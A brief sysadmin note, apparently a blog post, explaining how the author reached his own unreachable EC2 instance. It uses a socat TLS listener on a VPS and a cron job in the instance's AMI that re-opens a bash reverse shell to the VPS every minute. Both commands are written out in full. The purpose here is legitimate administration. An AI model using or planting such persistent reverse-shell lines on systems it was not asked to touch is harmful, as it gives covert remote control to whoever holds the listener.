Reverse shell via socat
Written by Eric Schwimmer
I had a grumpy EC2 instance that wasn't allowing any inbound connections after it initialized (turns out it had a rogue firewalld rule that was shutting me down). I was able to get in to debug it by running this on my VPS:
openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.pem && \ socat `tty`,raw,echo=0 openssl-listen:1237,reuseaddr,cert=cert.pem,verify=0
And then setting this up as a cron job in the grumpy EC2 instance's AMI:
* * * * * ps -ef | grep -q '[o]penssl-connect' || \ socat openssl-connect:<MY_VPS_IP>:1237,verify=0 exec:bash,pty,stderr,setsid
One minute after the EC2 instance came up, bam, I had a remote shell running on my VPS.